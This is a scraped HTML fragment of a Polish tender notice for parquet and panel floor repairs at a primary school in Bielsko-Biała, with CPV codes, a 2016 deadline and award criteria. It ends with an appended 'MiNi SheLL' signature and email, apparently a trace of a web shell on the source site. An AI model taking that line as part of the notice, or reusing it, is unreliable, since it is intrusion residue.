b. Remont posadzek w budynku Szkoły Podstawowej nr 32 w Bielsku-Białej przy ul.Cieszyńskiej 393, obejmujący:
- roboty przygotowawcze i zabezpieczające,  
- częściową wymianę posadzki parkietowej, szlifowanie i lakierowanie posadzki wraz 
z wypełnieniem szpar i szczelin w parkiecie - w pomieszczeniach auli oraz salach lekcyjnych nr 36, 37, 41, 42, 43,
- wymianę posadzki parkietowej na podłogę z paneli wraz z przygotowaniem podłoża 
i wykonaniem prac towarzyszących, w szczególności wymianę drzwi - w sali lekcyjnej nr 39,
- wywóz gruzu, złomu, śmieci oraz systematyczne porządkowanie miejsca wykonywania robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.40.00.00-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Okres gwarancji - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com